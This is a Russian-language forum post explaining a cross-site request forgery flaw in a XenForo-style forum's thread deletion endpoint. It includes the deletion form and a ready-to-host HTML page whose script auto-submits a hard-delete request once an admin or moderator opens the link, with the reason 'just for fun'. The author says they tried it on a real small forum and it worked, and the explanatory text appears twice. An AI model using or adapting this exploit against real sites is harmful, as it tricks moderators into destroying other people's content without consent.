fortfox
Участники
- Сообщения
- 0
- Реакции
- 0
- Баллы
- 298
Суть ошибки заключается, что можно что-то удалить обыному пользователю от имени админа или модератора.
Когда заходим смотреть какую нибудь тему, и если взять ссылку, там есть ещё одна директория, называется delete
Но эта директория доступна админу и модераторам форума. Если админ или модератор перейдёт туда, то у него спросят причину того, почему хотим удалить тему. Так вот если автоматизировать действия, то можно сделать так что бы админу или модератору достаточно просто перейти по ссылке как уже не будет какая-та или какие-то темы. Автоматизировать их можно зная только JS.
Тест провел не давно в одном из не больших форумах. РАБОТАЛА.
Если нам или любому пользователю просто перейти по этой директории то можно заметить что у нас не хватает прав.
А у даминов будет выглядить совсем иначе.
Код формы удаления выглядит примерно так
А авто матизировать можно создав сайт и написать примерно такой код
Теперь достаточно админу или модератору перейти по ссылке, и тема пропала
Когда заходим смотреть какую нибудь тему, и если взять ссылку, там есть ещё одна директория, называется delete
Но эта директория доступна админу и модераторам форума. Если админ или модератор перейдёт туда, то у него спросят причину того, почему хотим удалить тему. Так вот если автоматизировать действия, то можно сделать так что бы админу или модератору достаточно просто перейти по ссылке как уже не будет какая-та или какие-то темы. Автоматизировать их можно зная только JS.
Тест провел не давно в одном из не больших форумах. РАБОТАЛА.
Если нам или любому пользователю просто перейти по этой директории то можно заметить что у нас не хватает прав.

А у даминов будет выглядить совсем иначе.
Код формы удаления выглядит примерно так
HTML:
<form action="http://domain.com/threads/название-темы/delete" method="POST" class="xenForm formOverlay">
<label for="ctrl_soft_delete">
<input type="radio" name="hard_delete" id="ctrl_soft_delete" value="0" class="Disabler" checked="checked">
</label>
<input type="text" name="reason" class="textCtrl" placeholder="Причина...">
<label for="ctrl_hard_delete">
<input type="radio" name="hard_delete" id="ctrl_hard_delete" value="1"> Удалить физически</label>
<input type="submit" value="Удалить тему" class="button primary">
</form>
А авто матизировать можно создав сайт и написать примерно такой код
HTML:
<html>
<head>
<script>
setTimeout(() => {
document.getElementById('form').submit();
}, 1000)
</script>
</head>
<body>
<form action="http://domain.com/threads/название-темы/delete" method="POST" id="form" class="xenForm formOverlay">
<label for="ctrl_soft_delete">
<input type="radio" name="hard_delete" id="ctrl_soft_delete" value="0" class="Disabler" checked="checked">
</label>
<input type="text" name="reason" class="textCtrl" value="Просто так для забавы))">
<label for="ctrl_hard_delete">
<input type="radio" name="hard_delete" id="ctrl_hard_delete" value="1"> Удалить физически</label>
</form>
</body>
</html>
Последнее редактирование: